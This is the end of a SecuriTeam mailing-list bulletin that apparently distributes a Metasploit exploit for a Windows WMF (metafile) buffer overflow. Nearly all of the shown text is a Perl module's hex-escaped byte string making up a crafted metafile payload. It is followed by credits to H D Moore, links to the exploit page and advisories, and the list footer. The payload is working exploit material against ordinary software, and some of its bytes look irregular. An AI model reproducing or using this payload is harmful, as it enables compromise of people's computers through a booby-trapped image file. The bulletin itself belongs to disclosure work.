 "\x00\x02\x01\x01\x00\x19\x00\x00\x00\x32\x0a\xac\x01\xde\x01\x0c".
 "\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x0d".
 "\x00\x10\x00\x0f\x00\x0f\x00\x10\x00\x05\x00\x0c\x00\x34\x00\x0e".
 "\x00\x0f\x00\x0e\x00\x0f\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32".
 "\x0a\xac\x01\x6e\x02\x01\x00\x00\x00\x2d\x00\x07\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\x6f\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x2b\x00\x00\x00\x32\x0a\xac\x01\x75\x02\x18\x00\x00\x00\x65".
 "\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
 "\x65\x65\x65\x65\x65\x65\x20\x0b\x00\x08\x00\x08\x00\x0b\x00\x0a".
 "\x00\x05\x00\x0b\x00\x07\x00\x0a\x00\x0b\x00\x06\x00\x0b\x00\x0a".
 "\x00\x0b\x00\x07\x00\x0c\x00\x05\x00\x0b\x00\x0c\x00\x11\x00\x0c".
 "\x00\x05\x00\x0c\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x13\x00\x00\x00\x32".
 "\x0a\xc6\x01\xd2\x01\x08\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65".
 "\x20\x0c\x00\x08\x00\x0b\x00\x07\x00\x0b\x00\x05\x00\x0c\x00\x05".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x1e\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x00\x02\x01\x01\x00\x18\x00\x00\x00\x32\x0a\xdf\x01\xd2\x01\x0b".
 "\x00\x00\x00\x54\x52\x41\x46\x20\x3d\x20\x65\x65\x65\x65\x00\x0d".
 "\x00\x10\x00\x0f\x00\x0e\x00\x05\x00\x0c\x00\x06\x00\x0d\x00\x0f".
 "\x00\x0e\x00\x0f\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
 "\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
 "\x00\x00\xac\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
 "\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\xd2\x00\x00\x94\x0a\xdf".
 "\x01\x5c\x02\x01\x00\x00\x00\x2d\x00\x07\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x22".
 "\x00\x00\x00\x32\x0a\xdf\x01\x63\x02\x12\x00\x00\x00\x65\x65\x65".
 "\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x20\x0b".
 "\x00\x08\x00\x08\x00\x0b\x00\x0a\x00\x05\x00\x0b\x00\x07\x00\x0a".
 "\x00\x0c\x00\x05\x00\x07\x00\x0b\x00\x0a\x00\x07\x00\x0b\x00\x09".
 "\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x18\x00\x00\x00\x32\x0a\xf9\x01\xd2".
 "\x01\x0b\x00\x00\x00\x54\x52\x41\x49\x4c\x20\x3d\x20\x54\x4e\x46".
 "\x00\x0d\x00\x10\x00\x10\x00\x07\x00\x0f\x00\x05\x00\x0c\x00\x06".
 "\x00\x73\x00\x0f\x00\x0e\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\xa7".
 "\x0a\xf9\x01\x57\x02\x01\x00\x00\x00\x2d\x00\x07\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x21\x00\x00\x00\x32\x0a\xf9\x01\x5e\x02\x11\x00\x00\x00\x65".
 "\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
 "\x00\x08\x00\x0b\x00\x05\x00\x0b\x00\x07\x00\x0a\x00\x0b\x00\x05".
 "\x00\x0c\x00\x0b\x00\x0b\x00\x0b\x00\x07\x00\x0b\x00\x09\x00\x06".
 "\x00\x08\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x09\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\xf9\x01\xf8".
 "\x02\x01\x00\x00\x00\x2d\x00\x08\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x13\x00\x00".
 "\x00\x32\x0a\xf9\x01\x00\x03\x08\x00\x00\x00\x65\x65\x65\x65\x65".
 "\x65\x65\x65\x06\x00\x0c\x00\x0b\x00\x0b\x00\x0b\x00\x06\x00\x0b".
 "\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x10\x00\x00\x00\x32\x0a\x13\x02\xd2".
 "\x01\x06\x00\x00\x00\x65\x65\x65\x65\x65\x65\x06\x00\x05\x00\x0b".
 "\x00\x0b\x00\x0c\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\xad\x00\x00\x00\x32".
 "\x0a\x2c\x02\xd2\x01\x07\x00\x00\x00\x65\x65\x65\x65\x65\x20\x3d".
 "\x00\x0d\x00\x10\x00\x0f\x00\x0e\x00\x0e\x00\x06\x00\x0c\x00\x04".
 "\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05".
 "\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00".
 "\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\xd8\x02".
 "\x01\x01\x00\x0c\x00\x00\x00\x32\x0a\x2c\x02\x32\x02\x03\x00\x00".
 "\x00\x54\x64\x54\x00\x0e\x00\x0c\x00\x0d\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\xa4\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
 "\x00\x00\x00\x32\x0a\x2c\x02\x59\x02\x01\x7d\x00\x00\x2d\x00\x08".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x00\xba\x00\x00\x00\x02\x01\x02".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00".
 "\x00\x02\x01\x01\x00\x13\x00\x00\x00\x32\x0a\x2c\x02\x61\x02\x08".
 "\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x11\x00\x0a\x00\x0c".
 "\x00\x05\x00\x0b\x00\x07\x00\x0b\x00\x0b\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x0d".
 "\x00\x00\x00\x32\x0a\x2c\x02\xbb\x02\x04\x00\x00\x00\x65\x65\x65".
 "\x65\x0b\x00\x10\x00\x0d\x00\x0e\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x13\x00\x00".
 "\x00\x32\x0a\x2c\x02\xf6\x02\x08\x00\x00\x00\x65\x65\x65\x65\x65".
 "\x65\x65\x65\x0c\x00\x05\x00\x0b\x00\x0b\x00\x05\x00\x0a\x00\x0c".
 "\x00\x0b\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x2c\x02\x43".
 "\x03\x01\x00\x00\x00\x2d\x00\x08\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x15\x00\x00".
 "\x00\x32\x0a\x46\x02\xd2\x01\x09\x00\x00\x00\x65\x65\x65\x65\x65".
 "\x65\x65\x65\x20\x00\x05\x00\x0b\x00\x0b\x00\x0b\x00\x06\x00\x06".
 "\x00\x0b\x00\x0b\x00\x05\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x0d\x00\x00\x00\x32".
 "\x0a\x60\x02\xd2\x01\x04\x00\x00\x00\x7a\x56\x41\x44\x09\x00\x0f".
 "\x00\x0f\x00\x10\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00".
 "\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05".
 "\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18".
 "\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x60".
 "\x02\x09\x02\x01\x00\x00\x00\x2e\x00\x05\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x0c".
 "\x3f\x00\x00\x32\x0a\x60\x02\x0e\x02\x03\x00\x00\x00\x65\x65\x65".
 "\x00\x08\x00\x12\x00\x0b\x00\x04\x00\x30\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff".
 "\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e".
 "\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32".
 "\x0a\x60\x02\x38\x02\x01\x00\x00\x00\x3d\x00\x0c\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x21\x00\x00\x00\x32\x0a\x60\x02\x4a\x02\x11\x00\x00\x00\x65".
 "\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
 "\x00\x0b\x00\x0b\x00\x0b\xaf\x0a\x00\x0b\x00\x05\x00\x0b\x00\x0b".
 "\x00\x0a\x00\x0a\x00\x0b\x00\x09\x00\x0b\x00\x0c\x00\x0b\x00\x0b".
 "\x00\x06\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\xdd\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x09\x00\x00\x00\x32\x0a\x60\x02\xf6".
 "\x02\x01\x00\x00\x00\x2d\x00\x07\x00\x04\x00\x00\x00\x2e\x01\x01".
 "\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff".
 "\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00".
 "\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x10\x00\x00".
 "\x00\x32\x0a\x60\xeb\xfd\x02\x06\x00\x00\x00\x65\x65\x65\x65\x65".
 "\x65\x0b\x00\x0b\x00\x06\x00\x06\x00\x0b\x00\x0a\x00\x04\x00\x00".
 "\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00".
 "\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00".
 "\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01".
 "\x00\x09\x00\x00\x00\x32\x0a\x60\x02\x34\x03\x01\x00\x00\x00\x2d".
 "\x00\x07\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02".
 "\x01\x02\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00".
 "\x00\x14\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04".
 "\x00\x00\x00\x02\x01\x01\x00\x12\x00\x00\x00\x32\x0a\x60\x02\x3b".
 "\x03\x07\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x00\x0b\x00\x05".
 "\x00\x0c\x00\x0c\x4f\x05\x00\x0b\x00\x0a\x00\x04\x00\x00\x00\x2e".
 "\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02\x00\x05\x00\x00\x00\x09".
 "\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14\x02\x00\x00\x00\x00\x04".
 "\x00\x00\x00\x2e\x01\x18\x00\x04\x00\x00\x00\x02\x01\x01\x00\x09".
 "\x00\x00\x00\x32\x0a\x60\x02\x7d\x03\x01\x00\x00\x00\x2d\x00\x08".
 "\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04\x00\x00\x00\x02\x01\x02".
 "\x00\x05\x00\x00\x00\x09\x02\xff\xff\xff\x02\x05\x00\x00\x00\x14".
 "\x02\x00\x00\x00\x00\x04\x00\x00\x00\x2e\x01\x18\x00\x04\xf7\x62".
 "\x00\x02\x01\x01\x00\x31\x00\x00\xc3\x32\x0a\x79\x02\xd2\x01\x1c".
 "\x00\x00\x00\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65".
 "\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x65\x0b".
 "\x00\x08\x00\x0b\x00\x0c\x00\x08\x00\x07\x00\x0b\x00\x07\x00\x0a".
 "\x00\x05\x00\x08\x00\x06\x00\x0b\x00\x0c\x00\x08\x00\x0b\x00\x11".
 "\x00\x0a\x00\x08\x00\x0c\x00\x0b\x00\x05\x00\x0b\x00\x0a\x00\x07".
 "\x00\x0c\x00\x0b\x00\x0a\x00\x04\x00\x00\x00\x2e\x01\x01\x00\x04".
 "\x00\x00\x00\x02\x01\x02\x00\x04\x00\x00\x00\x02\x01\x02\x00\x04".
 "\x00\x00\x00\x2d\x01\x01\x00\x04\x00\x00\x00\x2d\x01\x04\x00\x10".
 "\x00\x00\x00\xfb\x02\x10\x00\x07\x00\x00\x00\x00\x00\xbc\x02\x00".
 "\x00\x00\xee\x01\x02\x02\x22\x53\x79\x73\x74\x65\x6d\x00\xee\x04".
 "\x00\x00\x00\x2d\x01\x05\x00\x04\x00\x00\x00\xf0\x01\x03\x00\x0f".
 "\x00\x00\x00\x26\x06\x0f\x00\x14\x00\x54\x4e\x50\x50\x04\x00\x0c".
 "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x00\x00".
 "\x00\x26\x06\x0f\x00\x08\x00\xff\xff\xff\xff\x01\x00\x00\x00\x03".
 "\x00\x00\x00\x00\x00";
}

1;

#EoF


ADDITIONAL INFORMATION

The information has been provided by  <mailto:hdm@metasploit.com> H D 
Moore.
The original article can be found at:  
<http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile> 
http://metasploit.com/projects/Framework/exploits.html#ie_xp_pfv_metafile
The advisory can be found at:  
<http://www.securiteam.com/windowsntfocus/6B0022KEKM.html> 
http://www.securiteam.com/windowsntfocus/6B0022KEKM.html,
 <http://www.securiteam.com/windowsntfocus/6A0012KEKI.html> 
http://www.securiteam.com/windowsntfocus/6A0012KEKI.html
For more information:  
<http://blogs.securiteam.com/index.php/archives/163> 
http://blogs.securiteam.com/index.php/archives/163



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages. 




<Prev in Thread] Current Thread [Next in Thread>
  • [EXPL] Microsoft Windows WMF Buffer Overflow (Exploit Metasploit), SecuriTeam <=